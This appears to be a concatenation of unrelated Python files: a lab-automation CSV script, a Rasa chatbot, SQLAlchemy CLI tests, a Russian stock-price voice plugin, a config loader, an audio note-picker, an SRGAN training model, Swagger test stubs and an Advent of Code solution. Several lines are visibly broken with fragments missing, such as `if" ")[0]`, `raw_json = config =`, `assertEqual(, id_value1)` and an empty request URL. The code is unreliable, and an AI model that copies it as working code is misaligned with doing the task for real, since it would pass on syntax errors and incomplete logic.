obtain input and output plate names (barcode) for use in loop below output_plate_name = outputs[0].location[0].name # input container and location are not stored in the LIMS for the SDNA standards but can be extrapolated from metadata in # the reagent record. if" ")[0] == 'SDNA': input_plate_name = sdna_barcode input_location =" ")[2] else: input_plate_name = art.location[0].name # remove colon from input location as this is not compatible with Hamilton Venus software input_location = art.location[1].replace(':', '') for output in outputs: # create the csv line with key based on output location that can be sorted by column then row csv_dict[output.location[1]] = [, input_plate_name, input_location, self.process.udf['Sample Volume (ul)'], output_plate_name, output.location[1].replace(':', ''), self.process.udf['Master Mix Volume (ul)']] return csv_dict if __name__ == '__main__': sys.exit(GenerateHamiltonInputSeqQuantPlate().run())
<gh_stars>0 from rasa_core.agent import Agent from rasa_core.interpreter import RasaNLUInterpreter interpreter = RasaNLUInterpreter('models/current/nlu') messages = ["Hi! you can chat in this window. Type 'stop' to end the conversation."] agent = Agent.load('models/current/dialogue', interpreter=interpreter) def respond_to_messages(message): responses = agent.handle_message(message) for r in responses: messages.append(r.get("text")) return responses
# -*- coding: utf-8 -*- import re import sys import unittest from io import StringIO from iktomi.cli.sqla import Sqla, drop_everything from sqlalchemy import ( create_engine, orm, MetaData, Column, Integer, ForeignKey, ) from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.dialects.mysql import MEDIUMTEXT try: from unittest import mock except ImportError: import mock __all__ = ['SqlaTests'] class SqlaTests(unittest.TestCase): def test_drop_everything(self): # Prepare. # Non-trivial case with circular foreign key constraints. # SQLite doesn't support dropping constraint by name and creation of # custom types, so these cases are not covered by the test. Base = declarative_base() class A(Base): __tablename__ = 'A' id = Column(Integer, primary_key=True) b_id = Column(ForeignKey('', use_alter=True)) class B(Base): __tablename__ = 'B' id = Column(Integer, primary_key=True) a_id = Column(ForeignKey( engine = create_engine('sqlite://') Base.metadata.create_all(bind=engine) self.assertTrue(engine.has_table('A')) self.assertTrue(engine.has_table('B')) # Actual test drop_everything(engine) self.assertFalse(engine.has_table('A')) self.assertFalse(engine.has_table('B')) def test_specific_dialect(self): Base = declarative_base() class Obj(Base): __tablename__ = 'Obj' id = Column(Integer, primary_key=True) text = Column(MEDIUMTEXT) engine = create_engine('mysql+pymysql://') cli = Sqla(orm.sessionmaker(bind=engine), metadata=Base.metadata) schema = cli._schema(Obj.__table__) self.assertIn('MEDIUMTEXT', schema) def test_create_drop_tables_single_meta(self): Base = declarative_base() class A(Base): __tablename__ = 'A' id = Column(Integer, primary_key=True) engine = create_engine('sqlite://') cli = Sqla(orm.sessionmaker(bind=engine), metadata=Base.metadata) for verbose in [False, True]: cli.command_create_tables(verbose=verbose) self.assertTrue(engine.has_table('A')) with mock.patch.object(sys.stdin, 'readline', return_value='n'): try: cli.command_drop_tables() except SystemExit: pass self.assertTrue(engine.has_table('A')) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_drop_tables() self.assertFalse(engine.has_table('A')) def test_create_drop_tables_several_meta(self): Base1 = declarative_base() class A1(Base1): __tablename__ = 'A' id = Column(Integer, primary_key=True) Base2 = declarative_base() class A2(Base2): __tablename__ = 'A' id = Column(Integer, primary_key=True) engine1 = create_engine('sqlite://') engine2 = create_engine('sqlite://') binds = { A1.__table__: engine1, A2.__table__: engine2, } meta = { 'm1': Base1.metadata, 'm2': Base2.metadata, 'm3': MetaData(), } cli = Sqla(orm.sessionmaker(binds=binds), metadata=meta) for verbose in [False, True]: cli.command_create_tables(verbose=verbose) self.assertTrue(engine1.has_table('A')) self.assertTrue(engine2.has_table('A')) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_drop_tables('m1') self.assertFalse(engine1.has_table('A')) self.assertTrue(engine2.has_table('A')) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_drop_tables() self.assertFalse(engine1.has_table('A')) self.assertFalse(engine2.has_table('A')) cli.command_create_tables('m1', verbose=verbose) self.assertTrue(engine1.has_table('A')) self.assertFalse(engine2.has_table('A')) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_drop_tables() self.assertFalse(engine1.has_table('A')) self.assertFalse(engine2.has_table('A')) cli.command_create_tables('m3', verbose=verbose) self.assertFalse(engine1.has_table('A')) self.assertFalse(engine2.has_table('A')) def test_reset(self): Base = declarative_base() class A(Base): __tablename__ = 'A' id = Column(Integer, primary_key=True) id_values = [id_value1, id_value2] = [12, 34] # Each time it uses different value def initial(db): db.add(A(id=id_values.pop(0))) engine = create_engine('sqlite://') cli = Sqla(orm.sessionmaker(bind=engine), metadata=Base.metadata, initial=initial) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_reset() query = cli.session.query(A) self.assertEqual(query.count(), 1) a = self.assertEqual(, id_value1) with mock.patch.object(sys.stdin, 'readline', return_value='y'): cli.command_reset() query = cli.session.query(A) self.assertEqual(query.count(), 1) a = self.assertEqual(, id_value2) _created_tables = re.compile(r'create\s+table\s+\W?(\w+)', re.I).findall def test_schema_single_meta(self): Base = declarative_base() class A(Base): __tablename__ = 'A' id = Column(Integer, primary_key=True) class B(Base): __tablename__ = 'B' id = Column(Integer, primary_key=True) engine = create_engine('sqlite://') cli = Sqla(orm.sessionmaker(bind=engine), metadata=Base.metadata) output = StringIO() with mock.patch.object(sys, 'stdout', output): cli.command_schema() created = self._created_tables(output.getvalue()) self.assertEqual(len(created), 2) self.assertEqual(created.count('A'), 1) self.assertEqual(created.count('B'), 1) output = StringIO() with mock.patch.object(sys, 'stdout', output): cli.command_schema('A') created = self._created_tables(output.getvalue()) self.assertEqual(created, ['A']) output = StringIO() with mock.patch.object(sys, 'stdout', output): try: cli.command_schema('C') except SystemExit: pass created = self._created_tables(output.getvalue()) self.assertEqual(created, []) def test_schema_several_meta(self): Base1 = declarative_base() class A1(Base1): __tablename__ = 'A' id = Column(Integer, primary_key=True) class B1(Base1): __tablename__ = 'B' id = Column(Integer, primary_key=True) Base2 = declarative_base() class A2(Base2): __tablename__ = 'A' id = Column(Integer, primary_key=True) engine1 = create_engine('sqlite://') engine2 = create_engine('sqlite://') binds = { A1.__table__: engine1, B1.__table__: engine1, A2.__table__: engine2, } meta = { 'm1': Base1.metadata, 'm2': Base2.metadata, 'm3': MetaData(), } cli = Sqla(orm.sessionmaker(binds=binds), metadata=meta) output = StringIO() with mock.patch.object(sys, 'stdout', output): cli.command_schema() created = self._created_tables(output.getvalue()) self.assertEqual(len(created), 3) self.assertEqual(created.count('A'), 2) self.assertEqual(created.count('B'), 1) output = StringIO() with mock.patch.object(sys, 'stdout', output): cli.command_schema('m1') created = self._created_tables(output.getvalue()) self.assertEqual(len(created), 2) self.assertEqual(created.count('A'), 1) self.assertEqual(created.count('B'), 1) output = StringIO() with mock.patch.object(sys, 'stdout', output): cli.command_schema('m1.B') created = self._created_tables(output.getvalue()) self.assertEqual(created, ['B']) output = StringIO() with mock.patch.object(sys, 'stdout', output): try: cli.command_schema('m2.B') except SystemExit: pass created = self._created_tables(output.getvalue()) self.assertEqual(created, []) output = StringIO() with mock.patch.object(sys, 'stdout', output): try: cli.command_schema('m3.A') except SystemExit: pass created = self._created_tables(output.getvalue()) self.assertEqual(created, []) def test_gen(self): gen_a = mock.MagicMock() cli = Sqla(orm.sessionmaker(), MetaData(), generators={'a': gen_a}) try: cli.command_gen() except SystemExit: pass gen_a.assert_not_called() gen_a.reset_mock() cli.command_gen('a') gen_a.assert_called_once_with(cli.session, 0) gen_a.reset_mock() cli.command_gen('a:123') gen_a.assert_called_once_with(cli.session, 123)
from vacore import VACore import os modname = os.path.basename(__file__)[:-3] # calculating modname # функция на старте def start(core:VACore): manifest = { "name": "Акции на Московской бирже", "version": "1.2", "require_online": True, "commands": { }, "default_options": { "tickers": { "": [ # "ирина акции" ["sber", "Сбер"], ["gazp", "Газпром"] ], "сбер": [ # "ирина акции сбер" ["sber", "Сбер"], ], }, "portfolios": { # разные портфели акций "тест": { # команда "ирина портфель тест" "portfolio": [ # портфель акций ["sberp", 100], ["sber", 100] ], "start_inv": 40000, # стартовая цена портфеля } } } } return manifest def start_with_options(core:VACore, manifest:dict): # модифицируем манифест, добавляя команды на основе options, сохраненных в файле cmds = {} cmdoptions = manifest["options"]["portfolios"] for cmd in cmdoptions.keys(): cmds[cmd] = (run_portfolio, cmdoptions[cmd]) manifest["commands"]["портфель"] = cmds cmds2 = {} cmdoptions = manifest["options"]["tickers"] for cmd in cmdoptions.keys(): cmds2[cmd] = (run_stocks, cmdoptions[cmd]) manifest["commands"]["акции|акция"] = cmds2 return manifest data_stocks = {} def update_stocks(): try: import requests res = requests.get(",LAST") data = res.json() global data_stocks data_stocks = {} for st in data["marketdata"]["data"]: data_stocks[st[0]] = st[1] return True except: import traceback traceback.print_exc() return False def run_stocks(core:VACore, phrase:str, param): isUpdated = update_stocks() if isUpdated: #print(data_stocks["SBERP"]) #options = core.plugin_options(modname) #from utils.num_to_text_ru import num2text txt = "" for t in param: price = data_stocks[str(t[0]).upper()] pricetxt = str(price) if price > 1000: # спецкейс для дорогих акций, иначе тупо from utils.num_to_text_ru import num2text pricetxt = num2text(int(price)) txt += t[1]+" "+pricetxt+" . " core.say(txt) else: core.say("Проблемы с соединением с биржей") def run_portfolio(core:VACore, phrase:str, param: dict): isUpdated = update_stocks() if isUpdated: #print(data_stocks["SBERP"]) from utils.num_to_text_ru import num2text sum = 0 for t in param["portfolio"]: cur = data_stocks[str(t[0]).upper()] value = cur*t[1] print("{0}: {1} шт по цене {2} - всего {3}".format(str(t[0]).upper(),t[1],cur,value)) sum += value print("Всего: {0}".format(sum)) # округляем до удобного sum = int(sum/1000)*1000 txt = "Стоимость портфеля {0} . ".format(num2text(sum)) if sum > param["start_inv"]: txt += "Текущая прибыль {0} . ".format(num2text(sum-param["start_inv"])) else: txt += "Текущий убыток {0} . ".format(num2text(param["start_inv"]-sum)) core.say(txt) else: core.say("Проблемы с соединением с биржей")
from glob import glob import json import os import re import yaml if os.path.exists("./savedata/config.json"): with open("./savedata/config.json") as json_file: raw_json = config = json.loads(raw_json) else: with open("./savedata/config.json", "w") as json_file: json_file.write("{}") config = {} with open("./config-types") as f: config_types = { re.compile(re.escape(k).replace(r"\*", r"\w+")): v.strip() for k, v in dict( map(lambda line: line.strip().split(":"), f.readlines()) ).items() } for dpb_yml in glob("./packages/*@*/dpb.yml"): with open(dpb_yml) as f: custom_config_type = yaml.safe_load(f) try: with open( os.path.dirname(dpb_yml) + "/" + custom_config_type.get("config-types", "config-types"), ) as custom_config_type_file: config_types.update( { re.compile(re.escape(k).replace(r"\*", r"\w+")): v.strip() for k, v in map( lambda line: line.strip().split(":"), custom_config_type_file.readlines(), ) } ) except FileNotFoundError: pass def convert_bool(value): if isinstance(value, bool): return value lowered = value.lower() if lowered in ("yes", "y", "true", "t", "1", "enable", "on"): return True elif lowered in ("no", "n", "false", "f", "0", "disable", "off"): return False else: return None def check_config_type(key): for config_type in config_types.items(): if config_type[0].match(key): return config_type[1] return None def convert_config(data): for key, value in data.items(): if isinstance(value, dict): data[key] = convert_config(value) elif check_config_type(key): key_type = check_config_type(key) if key_type == "bool": data[key] = convert_bool(value) elif key_type == "int": data[key] = int(value) elif key_type == "float": data[key] = float(value) else: pass else: pass return data config = convert_config(config)
# Filename: # # Summary: reads wav files # # Author: <NAME> # # Last Updated: Oct 07 2015 import sys # exit argv import time # time import wave # open getframerate getnchannels getsampwidth getnframes readframes error import numpy # empty uint8 fromstring shape reshape view import scipy.signal # fftconvolve class Picker(): def __init__(self): self.notes = () # tuple of Note objects self.signal = numpy.empty(0) # ndarray of amplitudes self.channels = 0 self.frequency = 0.0 self.no_samples = 0 self.sample_rate = 0 # TODO # Values must be adjusted for different songs # THRESHOLD is a value that represents a # minimum value in volume of the signal to # start determining if there is an audible # note. # NOTE is the minimum number of peaks above # the threshold to consider the part of the # signal an actual note. # BREAK is the minimum number of consecutive # peaks below the threshold to signify the # end of a possible note. def findNotes(self, signal): ''' Estimates the number of notes in the signal. ''' THRESHOLD = .45 NOTE = 50 BREAK = 50 # no_greater refers to the number of peaks above # the threshold. # no_less refers to the number of consecutive # peaks below the threshold. # unique marks a potential note for the storage # of the indices where it starts and ends. start = 0 end = 0 no_greater = 0 no_less = 0 unique = True notes = [] peaks = scipy.signal.argrelextrema(signal, numpy.greater)[0] # for every peak, check where it lies with # respect to the threshold. for peak in peaks: # if it is above, check if the note is # unique, increment the no_greater and # reset no_less. if (signal[peak] > THRESHOLD): if (unique): unique = False start = peak else: end = peak no_greater = no_greater + 1 no_less = 0 # otherwise, increment the no_less. else: no_less = no_less + 1 # if no_less is greater than BREAK, # check if no_greater is greater than # NOTE, append the note to the list if # appropriate, and reset the rest of # the values. if (no_less > BREAK): if (no_greater > NOTE): note = (start, end) notes.append(note) no_greater = 0 no_less = 0 unique = True if (no_greater > NOTE): note = (start, end) notes.append(note) return notes ''' ''' if __name__ == '__main__': notepicker = NotePicker()'../Music/c1.wav') notepicker.getFrequency() print notepicker.frequency audio = [] for index in range(1, len(sys.argv)): audio.append(str(sys.argv[index])) for filename in audio: start_time = time.time() signal, sample_rate = read(filename) freq = findFrequency(signal, sample_rate) print '******************************' print 'Number of Samples: %i' % len(signal) print 'Sample rate: %i' % sample_rate print 'Frequency: %.3f' % freq print 'Note: %s' % recognize(freq) print 'Time elapsed: %.3f s' % (time.time() - start_time) '''
<filename>superres/src/models/<gh_stars>10-100 import logging from collections import OrderedDict import torch import torch.nn as nn from torch.nn.parallel import DataParallel, DistributedDataParallel import models.networks as networks import models.lr_scheduler as lr_scheduler from .base_model import BaseModel from models.modules.loss import GANLoss, LMaskLoss logger = logging.getLogger('base') class SRGANModel(BaseModel): def __init__(self, opt): super(SRGANModel, self).__init__(opt) if opt['dist']: self.rank = torch.distributed.get_rank() else: self.rank = -1 # non dist training train_opt = opt['train'] self.train_opt = train_opt self.opt = opt self.segmentor = None # define networks and load pretrained models self.netG = networks.define_G(opt).to(self.device) if opt['dist']: self.netG = DistributedDataParallel(self.netG, device_ids=[torch.cuda.current_device()]) else: self.netG = DataParallel(self.netG) if self.is_train: self.netD = networks.define_D(opt).to(self.device) if train_opt.get("gan_video_weight", 0) > 0: self.net_video_D = networks.define_video_D(opt).to(self.device) if opt['dist']: self.netD = DistributedDataParallel(self.netD, device_ids=[torch.cuda.current_device()]) if train_opt.get("gan_video_weight", 0) > 0: self.net_video_D = DistributedDataParallel(self.net_video_D, device_ids=[torch.cuda.current_device()]) else: self.netD = DataParallel(self.netD) if train_opt.get("gan_video_weight", 0) > 0: self.net_video_D = DataParallel(self.net_video_D) self.netG.train() self.netD.train() if train_opt.get("gan_video_weight", 0) > 0: self.net_video_D.train() # define losses, optimizer and scheduler if self.is_train: # G pixel loss if train_opt['pixel_weight'] > 0: l_pix_type = train_opt['pixel_criterion'] if l_pix_type == 'l1': self.cri_pix = nn.L1Loss().to(self.device) elif l_pix_type == 'l2': self.cri_pix = nn.MSELoss().to(self.device) else: raise NotImplementedError('Loss type [{:s}] not recognized.'.format(l_pix_type)) self.l_pix_w = train_opt['pixel_weight'] else:'Remove pixel loss.') self.cri_pix = None # Pixel mask loss if train_opt.get("pixel_mask_weight", 0) > 0: l_pix_type = train_opt['pixel_mask_criterion'] self.cri_pix_mask = LMaskLoss(l_pix_type=l_pix_type, segm_mask=train_opt['segm_mask']).to(self.device) self.l_pix_mask_w = train_opt['pixel_mask_weight'] else:'Remove pixel mask loss.') self.cri_pix_mask = None # G feature loss if train_opt['feature_weight'] > 0: l_fea_type = train_opt['feature_criterion'] if l_fea_type == 'l1': self.cri_fea = nn.L1Loss().to(self.device) elif l_fea_type == 'l2': self.cri_fea = nn.MSELoss().to(self.device) else: raise NotImplementedError('Loss type [{:s}] not recognized.'.format(l_fea_type)) self.l_fea_w = train_opt['feature_weight'] else:'Remove feature loss.') self.cri_fea = None if self.cri_fea: # load VGG perceptual loss self.netF = networks.define_F(opt, use_bn=False).to(self.device) if opt['dist']: self.netF = DistributedDataParallel(self.netF, device_ids=[torch.cuda.current_device()]) else: self.netF = DataParallel(self.netF) # GD gan loss self.cri_gan = GANLoss(train_opt['gan_type'], 1.0, 0.0).to(self.device) self.l_gan_w = train_opt['gan_weight'] # Video gan weight if train_opt.get("gan_video_weight", 0) > 0: self.cri_video_gan = GANLoss(train_opt['gan_video_type'], 1.0, 0.0).to(self.device) self.l_gan_video_w = train_opt['gan_video_weight'] # can't use optical flow with i and i+1 because we need i+2 lr to calculate i+1 oflow if 'train' in self.opt['datasets'].keys(): key = "train" else: key = 'test_1' assert self.opt['datasets'][key]['optical_flow_with_ref'] == True, f"Current value = {self.opt['datasets'][key]['optical_flow_with_ref']}" # D_update_ratio and D_init_iters self.D_update_ratio = train_opt['D_update_ratio'] if train_opt['D_update_ratio'] else 1 self.D_init_iters = train_opt['D_init_iters'] if train_opt['D_init_iters'] else 0 # optimizers # G wd_G = train_opt['weight_decay_G'] if train_opt['weight_decay_G'] else 0 optim_params = [] for k, v in self.netG.named_parameters(): # can optimize for a part of the model if v.requires_grad: optim_params.append(v) else: if self.rank <= 0: logger.warning('Params [{:s}] will not optimize.'.format(k)) self.optimizer_G = torch.optim.Adam(optim_params, lr=train_opt['lr_G'], weight_decay=wd_G, betas=(train_opt['beta1_G'], train_opt['beta2_G'])) self.optimizers.append(self.optimizer_G) # D wd_D = train_opt['weight_decay_D'] if train_opt['weight_decay_D'] else 0 self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=train_opt['lr_D'], weight_decay=wd_D, betas=(train_opt['beta1_D'], train_opt['beta2_D'])) self.optimizers.append(self.optimizer_D) # Video D if train_opt.get("gan_video_weight", 0) > 0: self.optimizer_video_D = torch.optim.Adam(self.net_video_D.parameters(), lr=train_opt['lr_D'], weight_decay=wd_D, betas=(train_opt['beta1_D'], train_opt['beta2_D'])) self.optimizers.append(self.optimizer_video_D) # schedulers if train_opt['lr_scheme'] == 'MultiStepLR': for optimizer in self.optimizers: self.schedulers.append( lr_scheduler.MultiStepLR_Restart(optimizer, train_opt['lr_steps'], restarts=train_opt['restarts'], weights=train_opt['restart_weights'], gamma=train_opt['lr_gamma'], clear_state=train_opt['clear_state'])) elif train_opt['lr_scheme'] == 'CosineAnnealingLR_Restart': for optimizer in self.optimizers: self.schedulers.append( lr_scheduler.CosineAnnealingLR_Restart( optimizer, train_opt['T_period'], eta_min=train_opt['eta_min'], restarts=train_opt['restarts'], weights=train_opt['restart_weights'])) else: raise NotImplementedError('MultiStepLR learning rate scheme is enough.') self.log_dict = OrderedDict() self.print_network() # print network self.load() # load G and D if needed def feed_data(self, data, need_GT=True): self.img_path = data['GT_path'] self.var_L = data['LQ'].to(self.device) # LQ if need_GT: self.var_H = data['GT'].to(self.device) # GT if self.train_opt.get("use_HR_ref"): self.var_HR_ref = data['img_reference'].to(self.device) if "LQ_next" in data.keys(): self.var_L_next = data['LQ_next'].to(self.device) if "GT_next" in data.keys(): self.var_H_next = data['GT_next'].to(self.device) self.var_video_H =[data['GT'].unsqueeze(2), data['GT_next'].unsqueeze(2)], dim=2).to(self.device) else: self.var_L_next = None def optimize_parameters(self, step): # G for p in self.netD.parameters(): p.requires_grad = False self.optimizer_G.zero_grad() args = [self.var_L] if self.train_opt.get('use_HR_ref'): args += [self.var_HR_ref] if self.var_L_next is not None: args += [self.var_L_next] self.fake_H, self.binary_mask = self.netG(*args) #Video Gan if self.opt['train'].get("gan_video_weight", 0) > 0: with torch.no_grad(): args = [self.var_L, self.var_HR_ref, self.var_L_next] self.fake_H_next, self.binary_mask_next = self.netG(*args) l_g_total = 0 if step % self.D_update_ratio == 0 and step > self.D_init_iters: if self.cri_pix: # pixel loss l_g_pix = self.l_pix_w * self.cri_pix(self.fake_H, self.var_H) l_g_total += l_g_pix if self.cri_pix_mask: l_g_pix_mask = self.l_pix_mask_w * self.cri_pix_mask(self.fake_H, self.var_H, self.var_HR_ref) l_g_total += l_g_pix_mask if self.cri_fea: # feature loss real_fea = self.netF(self.var_H).detach() fake_fea = self.netF(self.fake_H) l_g_fea = self.l_fea_w * self.cri_fea(fake_fea, real_fea) l_g_total += l_g_fea # Image Gan if self.opt['network_D'] == "discriminator_vgg_128_mask": import torch.nn.functional as F from models.modules import psina_seg if self.segmentor is None: self.segmentor = psina_seg.base.SegmentationModule(encode='stationary_probs').to(self.device) self.segmentor = self.segmentor.eval() lr = F.interpolate(self.var_H, scale_factor=0.25, mode='nearest') with torch.no_grad(): binary_mask = (1 - self.segmentor.predict(lr[:, [2,1,0],::])) binary_mask = F.interpolate(binary_mask, scale_factor=4, mode='nearest') pred_g_fake = self.netD(self.fake_H, self.fake_H *(1-binary_mask), self.var_HR_ref, binary_mask * self.var_HR_ref) else: pred_g_fake = self.netD(self.fake_H) if self.opt['train']['gan_type'] == 'gan': l_g_gan = self.l_gan_w * self.cri_gan(pred_g_fake, True) elif self.opt['train']['gan_type'] == 'ragan': if self.opt['network_D'] == "discriminator_vgg_128_mask": pred_g_fake = self.netD(self.var_H, self.var_H *(1-binary_mask), self.var_HR_ref, binary_mask * self.var_HR_ref) else: pred_d_real = self.netD(self.var_H) pred_d_real = pred_d_real.detach() l_g_gan = self.l_gan_w * ( self.cri_gan(pred_d_real - torch.mean(pred_g_fake), False) + self.cri_gan(pred_g_fake - torch.mean(pred_d_real), True)) / 2 l_g_total += l_g_gan #Video Gan if self.opt['train'].get("gan_video_weight", 0) > 0: self.fake_video_H =[self.fake_H.unsqueeze(2), self.fake_H_next.unsqueeze(2)], dim=2) pred_g_video_fake = self.net_video_D(self.fake_video_H) if self.opt['train']['gan_video_type'] == 'gan': l_g_video_gan = self.l_gan_video_w * self.cri_video_gan(pred_g_video_fake, True) elif self.opt['train']['gan_type'] == 'ragan': pred_d_video_real = self.net_video_D(self.var_video_H) pred_d_video_real = pred_d_video_real.detach() l_g_video_gan = self.l_gan_video_w * ( self.cri_video_gan(pred_d_video_real - torch.mean(pred_g_video_fake), False) + self.cri_video_gan(pred_g_video_fake - torch.mean(pred_d_video_real), True)) / 2 l_g_total += l_g_video_gan # OFLOW regular if self.binary_mask is not None: l_g_total += 1* self.binary_mask.mean() l_g_total.backward() self.optimizer_G.step() # D for p in self.netD.parameters(): p.requires_grad = True if self.opt['train'].get("gan_video_weight", 0) > 0: for p in self.net_video_D.parameters(): p.requires_grad = True # optimize Image D self.optimizer_D.zero_grad() l_d_total = 0 pred_d_real = self.netD(self.var_H) pred_d_fake = self.netD(self.fake_H.detach()) # detach to avoid BP to G if self.opt['train']['gan_type'] == 'gan': l_d_real = self.cri_gan(pred_d_real, True) l_d_fake = self.cri_gan(pred_d_fake, False) l_d_total = l_d_real + l_d_fake elif self.opt['train']['gan_type'] == 'ragan': l_d_real = self.cri_gan(pred_d_real - torch.mean(pred_d_fake), True) l_d_fake = self.cri_gan(pred_d_fake - torch.mean(pred_d_real), False) l_d_total = (l_d_real + l_d_fake) / 2 l_d_total.backward() self.optimizer_D.step() # optimize Video D if self.opt['train'].get("gan_video_weight", 0) > 0: self.optimizer_video_D.zero_grad() l_d_video_total = 0 pred_d_video_real = self.net_video_D(self.var_video_H) pred_d_video_fake = self.net_video_D(self.fake_video_H.detach()) # detach to avoid BP to G if self.opt['train']['gan_video_type'] == 'gan': l_d_video_real = self.cri_video_gan(pred_d_video_real, True) l_d_video_fake = self.cri_video_gan(pred_d_video_fake, False) l_d_video_total = l_d_video_real + l_d_video_fake elif self.opt['train']['gan_video_type'] == 'ragan': l_d_video_real = self.cri_video_gan(pred_d_video_real - torch.mean(pred_d_video_fake), True) l_d_video_fake = self.cri_video_gan(pred_d_video_fake - torch.mean(pred_d_video_real), False) l_d_video_total = (l_d_video_real + l_d_video_fake) / 2 l_d_video_total.backward() self.optimizer_video_D.step() # set log if step % self.D_update_ratio == 0 and step > self.D_init_iters: if self.cri_pix: self.log_dict['l_g_pix'] = l_g_pix.item() if self.cri_fea: self.log_dict['l_g_fea'] = l_g_fea.item() self.log_dict['l_g_gan'] = l_g_gan.item() self.log_dict['l_d_real'] = l_d_real.item() self.log_dict['l_d_fake'] = l_d_fake.item() self.log_dict['D_real'] = torch.mean(pred_d_real.detach()) self.log_dict['D_fake'] = torch.mean(pred_d_fake.detach()) if self.opt['train'].get("gan_video_weight", 0) > 0: self.log_dict['D_video_real'] = torch.mean(pred_d_video_real.detach()) self.log_dict['D_video_fake'] = torch.mean(pred_d_video_fake.detach()) def test(self): self.netG.eval() with torch.no_grad(): args = [self.var_L] if self.train_opt.get('use_HR_ref'): args += [self.var_HR_ref] if self.var_L_next is not None: args += [self.var_L_next] self.fake_H, self.binary_mask = self.netG(*args) self.netG.train() def get_current_log(self): return self.log_dict def get_current_visuals(self, need_GT=True): out_dict = OrderedDict() out_dict['LQ'] = self.var_L.detach()[0].float().cpu() out_dict['SR'] = self.fake_H.detach()[0].float().cpu() if self.binary_mask is not None: out_dict['binary_mask'] = self.binary_mask.detach()[0].float().cpu() if need_GT: out_dict['GT'] = self.var_H.detach()[0].float().cpu() return out_dict def print_network(self): # Generator s, n = self.get_network_description(self.netG) if isinstance(self.netG, nn.DataParallel) or isinstance(self.netG, DistributedDataParallel): net_struc_str = '{} - {}'.format(self.netG.__class__.__name__, self.netG.module.__class__.__name__) else: net_struc_str = '{}'.format(self.netG.__class__.__name__) if self.rank <= 0:'Network G structure: {}, with parameters: {:,d}'.format(net_struc_str, n)) if self.is_train: # Discriminator s, n = self.get_network_description(self.netD) if isinstance(self.netD, nn.DataParallel) or isinstance(self.netD, DistributedDataParallel): net_struc_str = '{} - {}'.format(self.netD.__class__.__name__, self.netD.module.__class__.__name__) else: net_struc_str = '{}'.format(self.netD.__class__.__name__) if self.rank <= 0:'Network D structure: {}, with parameters: {:,d}'.format( net_struc_str, n)) if self.cri_fea: # F, Perceptual Network s, n = self.get_network_description(self.netF) if isinstance(self.netF, nn.DataParallel) or isinstance( self.netF, DistributedDataParallel): net_struc_str = '{} - {}'.format(self.netF.__class__.__name__, self.netF.module.__class__.__name__) else: net_struc_str = '{}'.format(self.netF.__class__.__name__) if self.rank <= 0:'Network F structure: {}, with parameters: {:,d}'.format( net_struc_str, n)) def load(self): # G load_path_G = self.opt['path']['pretrain_model_G'] if load_path_G is not None:'Loading model for G [{:s}] ...'.format(load_path_G)) self.load_network(load_path_G, self.netG, self.opt['path']['pretrain_model_G_strict_load']) if self.opt['network_G'].get("pretrained_net") is not None: self.netG.module.load_pretrained_net_weights(self.opt['network_G']['pretrained_net']) # D load_path_D = self.opt['path']['pretrain_model_D'] if self.opt['is_train'] and load_path_D is not None:'Loading model for D [{:s}] ...'.format(load_path_D)) self.load_network(load_path_D, self.netD, self.opt['path']['pretrain_model_D_strict_load']) # Video D if self.opt['train'].get("gan_video_weight", 0) > 0: load_path_video_D = self.opt['path'].get("pretrain_model_video_D") if self.opt['is_train'] and load_path_video_D is not None: self.load_network(load_path_video_D, self.net_video_D, self.opt['path']['pretrain_model_video_D_strict_load']) def save(self, iter_step): self.save_network(self.netG, 'G', iter_step) self.save_network(self.netD, 'D', iter_step) if self.opt['train'].get("gan_video_weight", 0) > 0: self.save_network(self.net_video_D, 'video_D', iter_step) @staticmethod def _freeze_net(network): for p in network.parameters(): p.requires_grad = False return network @staticmethod def _unfreeze_net(network): for p in network.parameters(): p.requires_grad = True return network def freeze(self, G, D): if G: = self._freeze_net( if D: self.netD.module = self._freeze_net(self.netD.module) def unfreeze(self, G, D): if G: = self._unfreeze_net( if D: self.netD.module = self._unfreeze_net(self.netD.module)
# coding: utf-8 """ Healthbot APIs API interface for Healthbot application # noqa: E501 OpenAPI spec version: 1.0.0 Contact: <EMAIL> Generated by: """ from __future__ import absolute_import import unittest import swagger_client from swagger_client.api.administration_api import AdministrationApi # noqa: E501 from import ApiException class TestAdministrationApi(unittest.TestCase): """AdministrationApi unit test stubs""" def setUp(self): self.api = swagger_client.api.administration_api.AdministrationApi() # noqa: E501 def tearDown(self): pass def test_create_groups(self): """Test case for create_groups Create groups # noqa: E501 """ pass def test_create_users(self): """Test case for create_users Create an user. # noqa: E501 """ pass def test_delete_group(self): """Test case for delete_group Delete groups # noqa: E501 """ pass def test_delete_user(self): """Test case for delete_user Delete list of users. # noqa: E501 """ pass def test_flush_groups(self): """Test case for flush_groups Flush the groups # noqa: E501 """ pass def test_flush_users(self): """Test case for flush_users Flush user base with new set of records. # noqa: E501 """ pass def test_get_group_details(self): """Test case for get_group_details Get lits of all the groups # noqa: E501 """ pass def test_get_user_details(self): """Test case for get_user_details Get lits of all the users # noqa: E501 """ pass def test_retrieve_groups(self): """Test case for retrieve_groups Get lits of all the groups # noqa: E501 """ pass def test_retrieve_roles(self): """Test case for retrieve_roles Get list of all the roles # noqa: E501 """ pass def test_retrieve_users(self): """Test case for retrieve_users Get lits of all the users # noqa: E501 """ pass def test_update_group(self): """Test case for update_group Get lits of all the roles # noqa: E501 """ pass def test_update_user_profile(self): """Test case for update_user_profile Update user profile informations. # noqa: E501 """ pass if __name__ == '__main__': unittest.main()
<reponame>evanbrumley/aoc2021 def main(): with open("input", "r") as f: numbers_raw = numbers = [int(num) for num in numbers_raw.splitlines() if num] last_num = None count = 0 for num in numbers: if last_num is not None and num > last_num: count += 1 last_num = num print(count) if __name__ == "__main__": main()
